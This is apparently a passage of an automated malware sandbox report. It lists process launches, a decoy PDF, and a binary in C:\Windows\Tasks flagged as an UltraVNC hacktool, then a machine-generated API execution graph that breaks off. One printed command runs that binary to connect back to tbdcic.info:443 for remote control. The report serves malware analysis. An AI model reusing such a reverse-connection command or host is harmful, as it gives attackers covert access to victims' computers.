                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:8
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:07:37:35
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                    Imagebase:0x7ff702560000
                                                                    File size:5'641'176 bytes
                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:11
                                                                    Start time:07:37:35
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:07:37:36
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                    Imagebase:0x7ff6c3ff0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:14
                                                                    Start time:07:37:36
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:taskkill /f /im sync_browser.exe
                                                                    Imagebase:0x580000
                                                                    File size:74'240 bytes
                                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:07:37:37
                                                                    Start date:23/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                    Imagebase:0x7ff6c3ff0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:16
                                                                    Start time:07:37:38
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:07:37:41
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 1
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:07:37:43
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:07:37:45
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\Tasks\sync_browser.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                    Imagebase:0x7ff7e5070000
                                                                    File size:1'945'368 bytes
                                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:24
                                                                    Start time:07:37:45
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 8
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:09:28:56
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\Tasks\sync_browser.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                                                                    Imagebase:0x7ff7e5070000
                                                                    File size:1'945'368 bytes
                                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:27
                                                                    Start time:09:28:56
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 2
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:09:28:58
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 4
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:29
                                                                    Start time:09:29:02
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:32
                                                                    Start time:09:29:44
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:33
                                                                    Start time:09:30:26
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:35
                                                                    Start time:09:31:08
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout /t 42
                                                                    Imagebase:0x240000
                                                                    File size:25'088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:18.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:26.6%
                                                                      Total number of Nodes:1618
                                                                      Total number of Limit Nodes:14
                                                                      execution_graph 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 